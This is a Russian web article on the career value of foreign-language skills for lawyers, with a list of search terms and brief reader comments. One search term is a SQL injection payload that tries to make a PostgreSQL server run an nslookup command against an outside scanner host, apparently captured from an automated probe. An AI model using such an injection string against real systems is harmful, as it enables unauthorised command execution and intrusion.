Последние новости
Статьи /

Юрист со знанием иностранного языка

В наше время, когда международные отношение очень сильно развиты, для хорошей карьеры важно владение иностранным языком. Причем знание языка нужно использовать именно на профессиональном уровне. Раньше в ВУЗах обучение профессиональным языковым навыкам было возможно в рамках международных специализаций. Сейчас все гораздо проще. Многие ВУЗЫ вообще отказались от программы международно- правового профиля, и предлагают более углубленное изучение нескольких иностранных языков в собственной программе обучения.

Сейчас во многих ВУЗах готовят как юристов общего профиля, так и юристов с углубленным изучением иностранного языка.Однако профессиональное изучение иностранного языка для юристов - это дело выбора студента. Студенты, углубленно изучающие иностранный язык легко ориентируются в иностранных текстах с юридическим содержанием, могут сами составлять юридические документы на иностранном языке, общаться на иностранном языке с легкостью. Такие юристы будут иметь больший спрос у работодателей.

У нас находят:
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-1808.1964.74e33.1.bxss.me
  • testing
  • зачем юристу иностранный язык
  • специальность юрист со знанием иностранного языка
  • знание иностранного языка юристом
4 комментария
dgiber / 26 июля 2012 / 15:25
Конечно, еще бы не иметь. Хороший юрист вообще должен уметь говорить, грамотно, четко и точно. Обычно таким людям и другие (иностранные) языки даются легко. Кроме того, что преподается в ВУЗе, сам обучающийся заинтересованный именно в углубленном, да и в профессиональном знании языка или языков, может, по-моему, и самостоятельно двигаться в этом направлении. Возможностей сейчас масса.
Ira_13 / 3 августа 2012 / 16:04
В любой профессии знание иностранного языка это дополнительный плюс, профессия юриста не исключение. Жаль, что очень сложно найти действительно хорошие курсы для изучение иностранных языков, изучение в теории и общение с преподавателями не всегда дают желаемым результат, лучше всего помогает практика с носителями этого языка.
Нурлан / 13 августа 2012 / 10:40
Нургалиева
Назаров Ернар / 16 августа 2012 / 14:13
Поступил ли в ВУЗ
имя


Популярые сообщения